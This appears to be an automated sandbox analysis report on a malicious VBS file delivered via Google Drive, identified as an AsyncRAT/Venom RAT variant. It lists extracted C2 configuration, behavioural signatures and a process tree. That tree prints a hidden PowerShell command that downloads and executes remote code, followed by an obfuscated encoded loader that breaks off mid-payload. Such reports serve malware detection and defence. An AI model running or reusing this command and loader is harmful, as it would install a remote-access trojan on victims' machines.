Analysis
-
max time kernel
240s -
max time network
247s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 20:07
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
HP Elite
45.88.88.7:4675
gbchkhrksazddij
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/244-271-0x0000015EEDE50000-0x0000015EEDE68000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 96 4560 powershell.exe 117 244 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 772 powershell.exe 244 powershell.exe 4560 powershell.exe 5320 powershell.exe 5936 powershell.exe 5824 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 14 drive.google.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 5164 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings powershell.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 81620.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 1096 msedge.exe 1096 msedge.exe 3972 msedge.exe 3972 msedge.exe 2116 identity_helper.exe 2116 identity_helper.exe 4176 msedge.exe 4176 msedge.exe 4560 powershell.exe 4560 powershell.exe 4560 powershell.exe 5320 powershell.exe 5320 powershell.exe 5320 powershell.exe 5936 powershell.exe 5936 powershell.exe 5936 powershell.exe 5824 powershell.exe 5824 powershell.exe 5824 powershell.exe 772 powershell.exe 772 powershell.exe 772 powershell.exe 244 powershell.exe 244 powershell.exe 244 powershell.exe 244 powershell.exe 244 powershell.exe 244 powershell.exe 244 powershell.exe 1328 msedge.exe 1328 msedge.exe 1328 msedge.exe 1328 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 5320 powershell.exe Token: SeDebugPrivilege 5936 powershell.exe Token: SeDebugPrivilege 5164 taskkill.exe Token: SeDebugPrivilege 5824 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeIncreaseQuotaPrivilege 772 powershell.exe Token: SeSecurityPrivilege 772 powershell.exe Token: SeTakeOwnershipPrivilege 772 powershell.exe Token: SeLoadDriverPrivilege 772 powershell.exe Token: SeSystemProfilePrivilege 772 powershell.exe Token: SeSystemtimePrivilege 772 powershell.exe Token: SeProfSingleProcessPrivilege 772 powershell.exe Token: SeIncBasePriorityPrivilege 772 powershell.exe Token: SeCreatePagefilePrivilege 772 powershell.exe Token: SeBackupPrivilege 772 powershell.exe Token: SeRestorePrivilege 772 powershell.exe Token: SeShutdownPrivilege 772 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeSystemEnvironmentPrivilege 772 powershell.exe Token: SeRemoteShutdownPrivilege 772 powershell.exe Token: SeUndockPrivilege 772 powershell.exe Token: SeManageVolumePrivilege 772 powershell.exe Token: 33 772 powershell.exe Token: 34 772 powershell.exe Token: 35 772 powershell.exe Token: 36 772 powershell.exe Token: SeIncreaseQuotaPrivilege 772 powershell.exe Token: SeSecurityPrivilege 772 powershell.exe Token: SeTakeOwnershipPrivilege 772 powershell.exe Token: SeLoadDriverPrivilege 772 powershell.exe Token: SeSystemProfilePrivilege 772 powershell.exe Token: SeSystemtimePrivilege 772 powershell.exe Token: SeProfSingleProcessPrivilege 772 powershell.exe Token: SeIncBasePriorityPrivilege 772 powershell.exe Token: SeCreatePagefilePrivilege 772 powershell.exe Token: SeBackupPrivilege 772 powershell.exe Token: SeRestorePrivilege 772 powershell.exe Token: SeShutdownPrivilege 772 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeSystemEnvironmentPrivilege 772 powershell.exe Token: SeRemoteShutdownPrivilege 772 powershell.exe Token: SeUndockPrivilege 772 powershell.exe Token: SeManageVolumePrivilege 772 powershell.exe Token: 33 772 powershell.exe Token: 34 772 powershell.exe Token: 35 772 powershell.exe Token: 36 772 powershell.exe Token: SeIncreaseQuotaPrivilege 772 powershell.exe Token: SeSecurityPrivilege 772 powershell.exe Token: SeTakeOwnershipPrivilege 772 powershell.exe Token: SeLoadDriverPrivilege 772 powershell.exe Token: SeSystemProfilePrivilege 772 powershell.exe Token: SeSystemtimePrivilege 772 powershell.exe Token: SeProfSingleProcessPrivilege 772 powershell.exe Token: SeIncBasePriorityPrivilege 772 powershell.exe Token: SeCreatePagefilePrivilege 772 powershell.exe Token: SeBackupPrivilege 772 powershell.exe Token: SeRestorePrivilege 772 powershell.exe Token: SeShutdownPrivilege 772 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeSystemEnvironmentPrivilege 772 powershell.exe Token: SeRemoteShutdownPrivilege 772 powershell.exe Token: SeUndockPrivilege 772 powershell.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 244 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3972 wrote to memory of 1540 3972 msedge.exe 84 PID 3972 wrote to memory of 1540 3972 msedge.exe 84 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 3496 3972 msedge.exe 85 PID 3972 wrote to memory of 1096 3972 msedge.exe 86 PID 3972 wrote to memory of 1096 3972 msedge.exe 86 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87 PID 3972 wrote to memory of 4680 3972 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://drive.google.com/open?id=1IEytWERQpW-P1OcplzPCk0KmjuAW6Ldf1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9189546f8,0x7ff918954708,0x7ff9189547182⤵PID:1540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:82⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵PID:2796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:12⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:12⤵PID:1568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:82⤵PID:2236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:12⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:82⤵PID:1060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Turbo Generator_Pictures & Drawing.vbs"2⤵
- Checks computer location settings
PID:1936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand  
         $ R O q F w g o A   =   2 5 1 0  
         $ S j X Q U x b X   =   ( [ M a t h ] : : S q r t ( $ Y H Y U r f O z )   *   4 4 ) . T o S t r i n g ( )  
         $ J S U S m M U Y   =   " 2 "  
         $ U b e E c Y O f   =   " S "  
         $ U d O w K f I x   =   " 6 "  
         $ z D e b n y A F   =   " V "  
         $ s O q V N X V f   =   " G "  
         $ r o O Z q I a w   =   " K "  
         $ f A e y E j h C   =   " 7 "  
         $ P Q Y s P l A g   =   " r "  
         $ O P I a F d Z G   =   " q "  
         $ m u g w H w i N   =   " l "  
         $ g R H q G y X E   =   " l "  
         $ f B n l M B Z F   =   " F "  
         $ E N e X f O N N   =   " K "  
         $ f S N F r Z B G   =   " J "  
         $ n x J F I b R D   =   " b "  
         $ O F U F Z a b Z   =   " k "  
         $ t 1   =   8 0   +   8 8  
         $ t 2   =   ( $ t 1   *   4 )   -   ( $ t 1   /   9 )  
         $ t 3   =   " 2 "   +   " S "   +   " 6 "   +   " V "   +   " G "  
         $ t 4   =   " K "   +   " 7 "   +   " r "   +   " q "   +   " l "  
         $ t 5   =   " l "   +   " F "   +   " K "   +   " J "   +   " b "   +   " k "  
         $ p   =   $ t 3   +   $ t 4   +   $ t 5  
         $ a   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ p )  
         $ d   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " t D b / 1 X a 0 U M u N e 3 K s Z k w A b o E h m 4 R D y Y x t + q j e E E t 7 z t 4 0 I O T w k x u f o r g M o v E P w 5 d 5 v i Z B w b s d / Y f P O 2 Y y D c C i d T A t l b W s Q x e V v O C q N D O x T x g r C + 9 F B b J G + d r K G L R d X i W h J r p W c w Z A J c 7 D 1 O X R M 3 s I H P p E E O Q g v J A j Y u Q M Z B W G N 7 x Y L W W w Q h q r 7 H c t E F n E w 5 8 n e R l e S 2 K Q / 1 9 5 o K B n L k b C t l p z 1 2 M R 5 b 6 R M Y Z r o + f 9 B E + W q 7 z G H P y 9 / C R N l 9 U S Q d 2 6 f r M Z 6 + T k R i a 5 H m g t n 9 m R S w M X J i 1 / n v b Z 0 X j s W r C + 1 H h b O v 8 D 0 5 l 6 y 8 5 X e + O 9 c 8 6 f X v W 2 3 7 C i 8 7 V G P i + G j 1 O 9 d p 9 H 1 6 0 F P G 8 0 O 7 3 l W Q K h X 6 C v Q V b p j i A M I c Y W 7 Y i b r p 1 V B h S K 2 B k D v y G + Z T 6 V b k h R 2 w d 8 Z j x B Z J C M V K 5 I 0 d b u v 7 U j R U O U 3 A 6 j 8 6 4 W L 5 + S I B z o + h G w B + V 0 b v P p j J L V T 3 O v F W V D 2 f W 0 l 4 P A F Y N W n y I d o h W k U 8 V W I 9 2 + X c S L x Y t 1 U m i 2 L n 4 c 6 G g J f E A Q 7 W 7 x b A X R q 3 e F q d k N N 4 e o G T X 8 O R H d B Y I 7 W e 2 g g E Z r I E Z V y 0 9 k 6 k 4 9 x t i C e e H x W 6 j A m 4 I v y a f 2 N M C n m S D h + i p d 6 U 6 A 8 R 8 S p M w 4 y 7 e l E H + 6 g A e f 7 Z n 3 D I q m y S q o P x N h s d 3 V s x D Z o h I + e M 5 5 k X e 4 d q f T 6 K L + I J h d v 2 j Z Z w z T S G f c m b s w 0 G g 2 b x G g G c u y v p t S O q t Q H 1 z S s i D 7 W T e U f X P 1 Y c T M 3 5 s b z W Z y t x L o w h s R E d f 5 Y X 9 W W a m V 9 1 a 9 m a Q J f s / O 9 8 r S y 2 h i n w G P 7 z F 3 d p T R S 3 + R n C + u j E d x 0 7 6 A n 9 t Q J D R r O i F y 5 k P m 4 8 T T + r Y 7 j i f W W q r f N 5 V 0 + I z u n q K 5 r 4 Y F L 4 p P J i Y Y 1 7 6 X Y G g L 1 C w J G L p w x c Z G s / C T x S / y q 0 2 n m Z D c o i g e 2 4 x J g G S X a t J e u + f N p D B E 4 e 3 j v u q U 3 G h 4 V 3 b M K 4 J 9 Q W x 6 0 d l P 2 X M z c 8 e K Q Q b / B j U e T M / w q O j o K c n Y y x 5 R z c 8 R J K B t o + M T c C G A z 8 x L 9 B 7 3 0 j T N T u I 5 L 4 9 H q p Z W W b W B t 3 m O + W 6 m R o P r d x t e n y Q l J 2 I M 1 r I C j c s / i V p 2 Z n 5 B Q C e B Y S E X B F E L + G e R l B Z p 2 J 6 h 0 e D a K j 2 9 w Q U l K U x K P 3 c n E F B Z i O 1 r D 0 h / p T 3 5 H w R j 7 w L P 8 z I 8 l c A M p h j 0 J k A 7 O z j z 1 T F A 7 T Q p Y v v c E C g J e l F D 6 F z D N 9 w f Z c A R A p s s z N i L B u L k J 7 p l n m 9 Y s C n R e Y b 1 d S R o D q r c I / l q Z k / L 5 5 h Y 8 m F e 0 / 4 Z E x G n a 1 Q y n W M k z Y u m m t a w q / f 9 z m C w 2 Q s u H 8 S F a x 8 n 9 p P W n i T 9 w I c Q t K d i S Y a W e h r n b Y F 8 n Z b I f K C j Y 4 B V E c J 8 t 4 E e R d m p O g 7 8 o 4 g t B + c K A F a E H 1 W h e R o U P O N 3 B U M / 4 3 s a 5 V n v b B F B M K I V N p e 9 E Y U r M r J r O L 6 A P W I F k 6 C K s 0 R y L b w O W D Y B z X 6 R 2 / P H + D C Q A n I C E v W x w S 9 p J 3 Q y V f V F e v T e 7 W 8 c c y P n 6 T N U 7 B g n f D O T H R v 5 u s 3 m q t t y 8 0 u q + Y v J q o X f a q l o X K a g H j Y + K z 6 j 5 q J A A N + 4 2 V B x l u i N a g m g n L o y 4 Q k A 8 F b C G x D M r W 3 2 h y N n S d h 6 9 p U 1 K C j U C 0 p q k / a V w j H m R J 3 c 9 E c e k t v I h G K f 2 q S P O y r B S W M U n 5 E O 7 E u + o R t 2 U 9 8 v F m r 5 a U l E 3 + H C L j H L q l s K / n 3 O 8 i s z f P z h r 7 l g P i F i 1 e h n 2 C r Z j 3 l n H R G D e g 9 1 a s a l b 1 M C u 3 f f I 6 X M m + 4 R 7 u B 4 F T i 7 8 8 g F h c 7 V K N n v h / 5 0 k w + 9 N b c 1 y e M + f / I w M y V U c X y m y 2 5 q 8 d R u c k e X h X 8 e y 5 J / y p k a V s r p N K 5 Z B T w u f n 9 9 q w X b z g / n y X p C a A o 6 W c 4 m Q R d S U 9 p r j q r G f j O C m v y 5 U b o C 8 0 h V a j Y c R R 1 V r P 1 M o j R 2 t 8 H I J x W L X L 1 0 F D w N B B p P w Q N X l N O R I x f F b d v y c W s P X q G d R v D z T S 5 Q m i y x H u g e k x 5 T Y p 3 p P S i I u 7 O v K W W n Z i e p N I h 6 g 0 u E w w N s h u n S L i e e 2 U o K X 7 N s I a f E E v e a 6 2 A H h P H 9 i 6 Z V H P 1 h J a P b C W h N 9 3 0 1 v M O l p K 3 n C C s S / 5 x d J n D e Z z 2 9 J w U f W 7 y A g F W u i 9 3 R v N 7 C C t A B b t E T P h 8 O X E P 6 V 4 Y d K 3 M z a t z n U A S C / P H z w Y x n 7 n H U + Q L q / f I o D H e j f V U o O 3 C g s X 6 h 8 Z n h J 0 B E c y + H s e Z M 1 Y 2 f 6 f x p p 2 t E 9 m e I j Q w q y c F y C K h T K m h c Y 8 b 8 E 6 i 6 p 7 N m R 5 J a 3 X 4 I K L 9 Q 3 i t u y m v b h K 0 b h v b r 9 b B d C M h c K E 1 A H o A C w c n H E b h q v o E o u N n m j d y 2 C t I 2 X B F m T n E a Z o b 2 j N j V + M S 7 I b b w V R w I W r a u D M U U R z 9 D o 8 0 6 e w + z 5 t V x 3 n c s M R G D K Y R L V N 2 e 7 Y c O 9 7 J f a D B a a v / r E 8 p x 2 p h 3 u J a N d S R 4 E y 8 P y g j 1 G x 0 Z L 1 R + 6 f V W h g v D k i j R k X 9 n L 1 Y K U z i K o h I 1 P u p o 2 9 + u o Z 3 v 1 X Q 4 T G a q D 5 4 q 9 h S q u Z D C S J 4 0 h i H D U L R D w d 8 D e j 3 1 j P q 6 / z s 1 e A B h 4 i Q H j o M t A H f W z h A u L y Z 5 N N R G d 6 t a Q 6 U h J S i l F v u 5 k Y q k n w w c S 7 f c b V n V m e 4 J Y 5 5 V d + p 2 d / a f R f p M A k N 5 6 G 2 Z A F q I 8 D m G T E d s C P X p p U h k 8 a 6 P V l 1 G U S u b Z b e B O O 8 M h Q Q T f g K m H h Y T W A t N C l 3 4 D x s Q s L q R d x t v 7 C V Z c B Z P b l e I x A y s 3 C 7 E 6 d o p d q t Q d W L U B n u S 8 B h h B Q A 8 A 0 7 k c p 7 k z G D x C b D x Q q y H 4 w 6 S F E 3 o v L 5 O F R L S s K F O 4 H 9 z b k C V S T i U H 8 a T t 1 1 3 F j r 5 L p V E I 2 o Z O 5 i t P p r 8 C 6 X A C 8 P m J i G + E i N c 1 J M P P h M T q n u j c O u Q i k q s r S z 2 h u l h q B g v d u X D f / 1 D Z j D G 3 G g O J d w 9 6 8 Y c 4 3 n Y / y N f h l 9 m o t r t j b d A n r q g u D j H Z F x W S F W t W x V O N S r r M p 5 u g 1 R 8 W y p 6 F W I 7 v 4 5 8 l N L g 8 t m J q S 4 o + E w e q A M + o f f z k P Q / / s S r D 3 z H u R f v 1 L I B w n C N V Q 2 R d I D 0 p 5 V S + a U J 2 e p U v Y r B m K l m v b 5 C V G i 9 E L 4 n V E o G 9 W G x e C n t X C F U k F f i b Y N a R i u 8 s o W H K q O Q b v W D m L N f K 5 F m a l T H r C A T e / E 3 9 L D / L 5 4 H J P P a d z 9 k P G z u H J 9 Y e s 4 g k m 6 i M g w O A A F p 4 L E 5 1 v 4 u C Z 9 L F X 5 G M X J a g C 9 G r A i U C 3 f s y W h D P U K 8 7 Z 1 p 0 0 T x X R E G / 4 Y b R C c 5 z K P I 0 a B V V y B c a 4 8 3 Z N Z W b n H v r b M u P B J C h p U S r c G N G r 8 t A g p f M 6 3 D 7 w F L W M M 3 0 V N m N x 2 P w E r y / Z M N n U Y n R J 3 B v Q d r A U z B + E y q e P z E l 